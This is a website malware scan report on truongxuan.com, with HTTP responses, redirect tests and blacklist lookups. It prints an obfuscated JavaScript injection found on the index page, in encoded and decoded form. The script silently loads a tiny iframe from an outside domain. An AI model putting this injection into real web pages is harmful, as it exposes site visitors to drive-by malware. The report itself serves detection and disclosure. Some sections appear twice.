Scanned pages/files
Request | Server response | Status |
http://truongxuan.com/ | HTTP/1.1 200 OK Date: Fri, 03 Oct 2014 18:37:08 GMT Accept-Ranges: bytes ETag: "5f5c484ab3cfc91:c4afb" Server: Microsoft-IIS/6.0 Content-Length: 1712 Content-Location: http://truongxuan.com/truongxuan/index.htm Content-Type: text/html Last-Modified: Fri, 08 May 2009 08:02:10 GMT X-Powered-By: ASP.NET | clean |
http://truongxuan.com/truongxuan/index.htm | 200 OK Content-Length: 1712 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(String.fromCharCode(118,97,114,32,116,61,53,59,118,97,114,32,104,106,103,52,61,34,119,111,108,108,34,59,118,97,114,32,119,61,34,97,110,99,101,34,59,118,97,114,32,114,101,54,61,34,46,34,59,118,97,114,32,114,114,116,116,54,61,34,99,111,109,34,59,118,97,114,32,97,61,34,105,102,34,59,118,97,114,32,115,61,34,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,114,97,109,101,32,115,114,99,61,34,104,39,43,115,43,39,112,58,47,47,39,43,104,106,103,52,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,114,114,116,116,54,43,39,47,39,43,39,34,32,119,105,100,116,104,61,34,49,34,32,104,101,105,103,104,116,61,34,51,34,62,60,47,105,39,43,39,102,39,43,39,114,97,109,101,62,39,41,59,118,97,114,32,119,54,61,56,55,52,57,56,48,48,48,48,48,50,51,52,48)) Decoded script: var t=5;var hjg4="woll";var w="ance";var re6=".";var rrtt6="com";var a="if";var s="tt";document.write('<'+a+'rame src="h'+s+'p://'+hjg4+''+w+''+re6+''+rrtt6+'/'+'" width="1" height="3"></i'+'f'+'rame>');var w6=87498000002340 var t=5;var hjg4="woll";var w="ance";var re6=".";var rrtt6="com";var a="if";var s="tt";document.write('<'+a+'rame src="h'+s+'p://'+hjg4+''+w+''+re6+''+rrtt6+'/'+'" width="1" height="3"></i'+'f'+'rame>');var w6=87498000002340 <iframe src="http://wollance.com/" width="1" height="3"></iframe> Antivirus reports:
| ||
http://truongxuan.com/test404page.js | 404 Not Found Content-Length: 1549 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: truongxuan.com
Result:
HTTP/1.1 200 OK
Date: Fri, 03 Oct 2014 18:37:08 GMT
Accept-Ranges: bytes
ETag: "5f5c484ab3cfc91:c4afb"
Server: Microsoft-IIS/6.0
Content-Length: 1712
Content-Location: http://truongxuan.com/truongxuan/index.htm
Content-Type: text/html
Last-Modified: Fri, 08 May 2009 08:02:10 GMT
X-Powered-By: ASP.NET
...1712 bytes of data.
GET / HTTP/1.1
Host: truongxuan.com
Result:
HTTP/1.1 200 OK
Date: Fri, 03 Oct 2014 18:37:08 GMT
Accept-Ranges: bytes
ETag: "5f5c484ab3cfc91:c4afb"
Server: Microsoft-IIS/6.0
Content-Length: 1712
Content-Location: http://truongxuan.com/truongxuan/index.htm
Content-Type: text/html
Last-Modified: Fri, 08 May 2009 08:02:10 GMT
X-Powered-By: ASP.NET
...1712 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: truongxuan.com
Referer: http://www.google.com/search?q=truongxuan.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: truongxuan.com
Referer: http://www.google.com/search?q=truongxuan.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=truongxuan.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://truongxuan.com/
Result: truongxuan.com is not infected or malware details are not published yet.
Result: truongxuan.com is not infected or malware details are not published yet.